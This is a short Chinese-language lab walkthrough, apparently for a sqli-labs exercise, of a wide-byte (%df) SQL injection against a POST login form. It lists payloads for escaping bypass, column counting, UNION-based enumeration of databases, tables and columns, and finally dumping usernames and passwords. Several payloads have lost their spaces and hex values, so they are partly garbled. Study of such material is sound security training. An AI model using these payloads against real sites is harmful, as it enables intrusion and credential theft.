通过界面显示可知需要使用post进行注入,使用burp进行抓包
查找注入点
uname=aor1=1passwd=adminsubmit=Submit
提示显示进行了转义
加入%df
uname=a%dfor1=1passwd=adminsubmit=Submit
报错
使用#号进行注释
uname=a%dfor1=1#passwd=adminsubmit=Submit
成功说明存在注入
查看列数
uname=a%dforderby2#passwd=adminsubmit=Submit
使用3报错,使用2正确,说明有2列
查看当前库
uname=a%dfunionselect1,database()#passwd=adminsubmit=Submit
查看所有库
uname=a%dfunionselect1,group_concat(schema_name)frominformation_schema.schemata#passwd=adminsubmit=Submit
查看所有表
uname=a%dfunionselect1,group_concat(table_name)frominformation_schema.tableswheretable_schema=security#passwd=adminsubmit=Submit
报错
将security转为十六进制
uname=a%dfunionselect1,group_concat(table_name)frominformation_schema.tableswheretable_schema=0x#passwd=adminsubmit=Submit
查看所有字段
uname=a%dfunionselect1,group_concat(column_name)frominformation_schema.columnswheretable_name=0x#passwd=adminsubmit=Submit
查看账户和密码
uname=a%dfunionselect1,group_concat(concat_ws(0x7e,username,password))fromsecurity.users#passwd=adminsubmit=Submit
以此类推爆出所有数据。
声明本教程仅提供技术分享,不得用于非法用途利用此文所造成的任何直接或间接的损失,文章作者不承担任何责任网络安全你我他,维护安全靠大家小鸣同学的信安路